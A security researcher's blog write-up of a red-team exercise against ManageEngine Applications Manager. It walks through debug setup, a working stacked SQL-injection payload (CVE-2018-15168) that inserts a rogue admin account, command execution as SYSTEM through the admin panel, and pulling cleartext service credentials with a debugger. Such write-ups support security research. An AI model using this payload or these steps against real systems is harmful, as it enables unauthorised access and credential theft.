Zoho ManageEngine Applications Manager: From SQLi to RCE & More
In late 2019, I joined a rehearsal of cybersecurity called Red-Blue team which based on ‘attack and defense’ in real world, and I was Red. It took my Red-team a very short time to find out and exploit weaknesses of the victim’s systems. With a couple days trying to recon, I kept an eye on an application which is installed on the victim’s server called ManageEngine Applications Manager (MEAM), listens on port 9090. Let’s take a quick look at MEAM:
MEAM is described as a very powerful application — one of Zoho’s Enterprise class products, see more. According to this product description, I figured out that if I can take the control of this MEAM app, I will be able to escalate into services monitored by MEAM. The rehearsal was ended and I just did something interesting with MEAM. So, let’s dig deep into MEAM to see what you can do.
⚠️ This article is not a hacking tutorial!!!
0x01 — Setup debug environment
You can download the installer from:
- https://www.manageengine.com/products/applications_manager/download.html (latest version)
- http://archives.manageengine.com/applications_manager/ (older versions)
I choose the MEAM build no 13100, Windows Server 2012R2 OS and IntelliJ IDEA. After running installer, it takes a few minutes to start up completely. By default, app will listen on port 9090 in HTTP and login with admin/admin.
Step 1. Copy all .jar files from MEAM installation folder to a new folder. I named it meam_13100_jars.
Step 2. Create new java project with IntelliJ. I named it meam_13100. Open Project Structure (Ctrl + Alt + Shift + S), add meam_13100_jars to Libraries of the project.
Step 3. Open “AppManager_path\working\conf\wrapper.conf” and uncomment following rows to enable JPDA debugging.
Step 4. Restart service by running sequentially “AppManager_path\shutdownApplicationsManager.bat”, “AppManager_path\startApplicationsManager.bat”. Now debug port is on.
Step 5. In Run/Debug Configurations of project meam_13100, add new Remote configuration named remote_meam13100 to attach to remote JVM listened on port 5005.
Save and start the debug. DONE!!!
0x02 — From SQLi to RCE
Doing a trivial search for MEAM, it is verified that there are a series of critical vulnerabilities out there!!!
There is a ton of SQLi bugs included exploit payloads (and it’s not all!). Don’t be surprised why a lot of SQLi CVEs lead to Exec Code. It’s because of MEAM providing Exec Code as a function!!!
For demonstration, I choose CVE-2018–15168. The injection point is /editDisplaynames.do?method=editDisplaynames&resids=[SQLi]. And it makes exercise easier because it supports stacked query.
Let’s get started with second series.
Step 1. Use SQLi to create new admin-privilege account.
21232f297a57a5a743894a0e4a801fc3 is hash of admin (I got it from my debug env). Payload is:
/editDisplaynames.do?method=editDisplaynames&resids=1);insert+into+AM_UserPasswordTable+(userid,username,password)+values+($$1000222$$,$$super_admin$$,$$21232f297a57a5a743894a0e4a801fc3$$);insert+into+Am_UserGroupTable+(username,groupname)+values+($$super_admin$$,$$ADMIN$$);- -+
Step 2. Login with super_admin/admin. Access http://localhost:9090/showTile.do?TileName=.ExecProg and YESS! There is a function inside the administration panel that allows to execute commands on server with NT AUTHORITY\SYSTEM. Through my debug env, I figure out some folders (blog, logs,…) which I can get my command’s output. To use execute code by function, you just have to create an “Execute Program” action => press Execute button => get output to gather information.
0x03 — Gather credentials
I think this is the most interesting part to me. Actually, when you’re in the Red-team, you will want to dig as deep as possible into the victim’s system. To do that, at least you’ll have to have some information like IP, login info like username, password,… And yaahhh, MEAM has everything you need.
As I mentioned before, MEAM is a very powerful application which helps sysadmins monitoring their services/servers/applications,…. Some examples when editing a managed object:
You see!? It provides all we need!!! I’ll prov’ it now.
The Edit Monitor function doesn’t show the passwords of services. But it has to save them because it needs authenticating when doing monitoring jobs. I quickly figure out an easy way to get cleartexts of passwords by using my debug env.
When I press Test Credential button, the client send a POST method to server which calls to testCredential action, testCredentialForConfMonitors method:
Tracing it with my debug env, I jump into the method and pick a breakpoint in the following line:
And yesss, when the breakpoint is reached, I get the cleartexts of credentials when the MEAM server uses them to test the connection to service.
0x04 — Conclusions
When I was in the rehearsal, I had to do a very hard way to extract the credentials of services managed by the victim’s MEAM. After the rehearsal ended, I decided to learn more about MEAM. Finally I got something useful. So I highly recommend that you set up a debug env to explore more .